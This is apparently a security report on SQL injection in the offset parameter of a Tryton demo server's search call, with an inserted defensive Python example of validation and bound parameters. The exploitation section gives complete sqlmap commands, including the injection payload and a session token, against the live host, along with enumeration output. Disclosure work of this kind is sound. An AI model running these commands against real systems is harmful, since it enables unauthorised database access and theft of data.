SQL Injection vulnerability via offset parameter
Security Report
1. Introduction
This report outlines the findings from a security assessment of the target application demo7.2.tryton.org. The assessment focused on identifying SQL injection vulnerabilities and evaluating the potential impact on the system.
2. Methodology
SQL Injection Vulnerability
Endpoint: POST /demo7.2/
Parameters:
- params array in the JSON payload, specifically the second element (the offset value of the search call).
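As an added example that is not part of the report or of Tryton's own code, the following shows the server-side handling that closes this class of bug: the positional offset and limit values of a JSON-RPC search call are type-checked before any SQL is built, and then passed to the database driver as bound parameters instead of being interpolated into the query text. The vulnerable pattern is shown beside it for contrast. Function names, the party table and the use of sqlite3 (Tryton runs on PostgreSQL) are assumptions made so that the example runs offline.

```python
import json
import sqlite3


def parse_search_params(params):
    """Validate the positional params of model.<name>.search:
    [domain, offset, limit, order, context].

    Offset and limit must be plain non-negative integers. A string such
    as sqlmap's "0*" marker, a float or a bool is rejected here, before
    any SQL text exists.
    """
    if not isinstance(params, list) or len(params) < 3:
        raise ValueError("expected params of the form [domain, offset, limit, ...]")
    offset, limit = params[1], params[2]
    for name, value in (("offset", offset), ("limit", limit)):
        # bool is a subclass of int in Python, so exclude it explicitly
        if isinstance(value, bool) or not isinstance(value, int):
            raise TypeError(f"{name} must be an integer, got {type(value).__name__}")
        if value < 0:
            raise ValueError(f"{name} must be non-negative")
    return offset, limit


def unsafe_query(offset, limit):
    """The vulnerable pattern: caller-supplied values become part of the
    SQL text, so a non-numeric offset changes the query's grammar."""
    return f"SELECT id, name FROM party ORDER BY name LIMIT {limit} OFFSET {offset}"


def safe_search(conn, params):
    """Hardened form: validate first, then bind. The driver transmits the
    values separately from the statement, so they can never alter it."""
    offset, limit = parse_search_params(params)
    rows = conn.execute(
        "SELECT id, name FROM party ORDER BY name LIMIT ? OFFSET ?",
        (limit, offset),
    ).fetchall()
    return [name for _id, name in rows]


def make_db():
    """Constructed sample data standing in for Tryton's party table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE party (id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO party (name) VALUES (?)",
        [("Alice",), ("Bob",), ("Carol",), ("Dave",)],
    )
    return conn


def handle_request(conn, raw_json):
    """Minimal JSON-RPC style dispatcher: a malformed offset or limit
    produces an error response instead of reaching the database."""
    req = json.loads(raw_json)
    try:
        return {"id": req["id"], "result": safe_search(conn, req["params"])}
    except (TypeError, ValueError) as exc:
        return {"id": req["id"], "error": str(exc)}


if __name__ == "__main__":
    db = make_db()
    print(handle_request(db, '{"id": 1, "params": [[], 1, 2, [["name", "ASC"]], {}]}'))
    print(handle_request(db, '{"id": 2, "params": [[], "0*", 1000, [], {}]}'))
```

The check deliberately lives in the request-parsing layer rather than in the SQL builder: once a value has been validated as an int and is bound as a parameter, no later string handling can turn it back into injectable text.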
3. Vulnerability Type
- Boolean-based blind SQL injection
- Error-based SQL injection
- Stacked queries SQL injection
- Time-based blind SQL injection
4. Exploitation Steps
A user must be logged in in order to exploit this vulnerability.
Automated Detection Using sqlmap
python3 sqlmap.py -u "https://demo7.2.tryton.org/demo7.2/" --data='{"id":38,"method":"model.party.party.search","params":[[],"0*",1000,[["distance","ASC NULLS LAST"],["name","ASC"],["id",null]],{"client":"b4930c52-51e1-4e90-ac40-42b5559e9144","company_filter":"one","company":1,"language":"en","language_direction":"ltr","groups":[7,8,20,21,16,22,24,19,12,14],"company_work_time":{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}' --method=POST --headers="Authorization: Session [session_token], Content-Type: application/json" --level=5 --risk=3 --dbs --random-agent --threads=10 --hex
Enumerate Databases
Available Databases (Schemas):
- information_schema
- pg_catalog
- public
sudo python3 sqlmap.py -u "https://demo7.2.tryton.org/demo7.2/" --data='{"id":38,"method":"model.party.party.search","params":[[],"0*",1000,[["distance","ASC NULLS LAST"],["name","ASC"],["id",null]],{"client":"b4930c52-51e1-4e90-ac40-42b5559e9144","company_filter":"one","company":1,"language":"en","language_direction":"ltr","groups":[7,8,20,21,16,22,24,19,12,14],"company_work_time":{"h":3600,"m":60,"s":1,"Y":6912000,"M":576000,"w":144000,"d":28800}}]}' --method=POST --headers="Authorization: Session ZGVtbzoyOmI1MDlmZTBiYjYyZWJjYjk3ZmI5MzkxZjU2NDRiNDU0YzNkYWI0N2IxOGIxOWY3MWViNmQyMmIyMDUxYmVlOTE=, Content-Type: application/json" --level=5 --risk=3 --tables -D public --threads=10 --no-cast --random-agent
Database: public [255 tables]
- account_account-account_tax
- account_account_template-account_tax_template
- account_invoice-account_move_line
- account_invoice-additional-account_move
- account_invoice_line-account_tax
- account_invoice_line-stock_move
- bank_account-party_party